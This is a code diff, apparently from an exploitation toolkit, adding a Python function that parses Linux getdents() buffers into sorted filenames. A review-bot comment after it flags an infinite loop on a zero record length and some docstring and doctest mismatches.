+ Extracts data from a buffer emitted by getdents()
+
+ Arguments:
+ buf(str): Byte array
+
+ Returns:
+ A list of filenames.
+
+ Example:
+
+ >>> data = '5ade6d010100000010002e0000000004010000000200000010002e2e006e3d04092b6d010300000010007461736b00045bde6d010400000010006664003b3504'
+ >>> data = data.decode('hex')
+ >>> print dirents(data)
+ ['.', '..', 'fd', 'task']
+ """
+ d = []
+
+ while buf:
+ try:
+ ent = linux_dirent(buf)
+ except ValueError:
+ break
+ d.append(ent.d_name)
+ buf = buf[len(ent):]
+
+ return sorted(d)
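Review bot: `dirents` can spin forever on a malformed buffer: `linux_dirent.__len__` returns `d_reclen` straight from the data, so a record with `d_reclen == 0` (or any value not past the parsed header) leaves `buf = buf[len(ent):]` unchanged and the `while buf:` loop never terminates — this buffer usually comes back from a remote or exploited process, so treat it as untrusted and break on it: `if len(ent) <= 2 * context.bytes + 2: break  # zero/short reclen: corrupt or truncated record`. The docstring header names the function `unpack_dents(buf)` although it is `dirents`, and the Returns text should say the list is sorted, since the body returns `sorted(d)`. `hexdump` is imported but unused. The doctest decodes records with 4-byte `d_ino`/`d_off`, so it only passes when `context.bytes == 4`; wrap it in `with context.local(arch='i386'):` or state that dependency.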